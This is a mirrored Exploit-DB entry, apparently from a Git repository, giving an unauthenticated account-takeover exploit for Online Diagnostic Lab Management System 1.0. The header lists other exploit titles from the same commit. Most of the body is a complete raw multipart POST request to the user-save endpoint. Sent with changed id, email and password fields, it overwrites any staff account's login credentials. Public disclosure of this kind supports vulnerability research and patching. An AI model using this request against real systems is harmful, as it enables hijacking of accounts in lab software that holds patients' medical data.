bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50660.txt
Offensive Security 77bb25c902 DB: 2022-01-14 
8 changes to exploits/shellcodes

Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)
SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)
Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)
Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)
Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
WordPress Core 5.8.2 - 'WP_Query' SQL Injection
2022-01-14 05:01:58 +00:00

86 lines
No EOL
2.9 KiB
Text
Raw Permalink Blame History

#Exploit Title: Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)
#Date: 11/01/2022
#Exploit Author: Himash
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
#Version: 1.0
#Tested on: Kali Linux
Online Diagnostic Lab Management System 1.0 is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "email", "password" and "cpass" parameters.
#Steps to Reproduce
1. Send the below POST request by changing "id", "email", "password" and "cpass" parameters.
2. Log in to the user account by changed email and password.
POST /odlms/classes/Users.php?f=save_client HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------218422725412817326673495861673
Content-Length: 1551
Origin: http://localhost
Connection: close
Referer: http://localhost/odlms/?page=user
Cookie: PHPSESSID=b17cc4d8837f564fc77d7b3e49b00d1e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="id"
2
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="firstname"
Claire
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="middlename"
C
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="lastname"
Blake
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="gender"
Female
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="dob"
1997-10-14
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="contact"
09456789123
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="address"
Sample Address only
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="password"
Test@1234
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="cpass"
Test@1234
-----------------------------218422725412817326673495861673
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------218422725412817326673495861673--
Reference in a new issue View git blame Copy permalink